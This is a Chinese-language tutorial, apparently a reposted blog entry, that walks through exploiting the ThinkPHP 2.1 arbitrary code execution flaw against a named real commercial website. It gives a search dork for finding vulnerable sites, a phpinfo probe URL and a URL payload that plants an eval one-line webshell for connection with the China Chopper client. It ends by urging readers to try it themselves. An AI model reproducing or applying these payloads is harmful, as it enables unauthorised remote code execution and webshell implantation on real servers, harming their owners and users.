Thinkphp框架任意代码执行漏洞利用实战

Thinkphp框架任意代码执行漏洞利用实战
Thinkphp框架任意代码执行漏洞利用实战

Thinkphp框架任意代码执行漏洞利用实战

嗨我来了

不错我就是传说中的无敌美少男“疯子”大人是耶。

哈哈,开个玩笑

文章+截图大家都喜欢看漫画所以呵呵我YD了

开始吧

谷歌搜索关键字:intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }

实战网站:天语手机官网(https://www.360docs.net/doc/ce1680633.html,/)

天语这个手机品牌你们是知道的你们也懂的

查看漏洞是否修复,https://www.360docs.net/doc/ce1680633.html,/index.php/module/aciton/param1/${@phpinfo()}

网站后面添加 index.php/module/aciton/param1/${@phpinfo()}

那样就会出来服务器的系统配置信息等

然后查看到存在这个漏洞

我们就上一句话然后菜刀连接

https://www.360docs.net/doc/ce1680633.html,/index.php/module/action/param1/{${eval($_POST[mad])}}

index.php/module/action/param1/{${eval($_POST[mad])}}

出现这个然后就表示成功了如果是404 就表示已经修复了

然后我们利用菜刀

这样配置

然后就成功了

利用这个漏洞就是那么简单你们也尝试一下吧骚年们BY:疯子

相关主题
相关文档
最新文档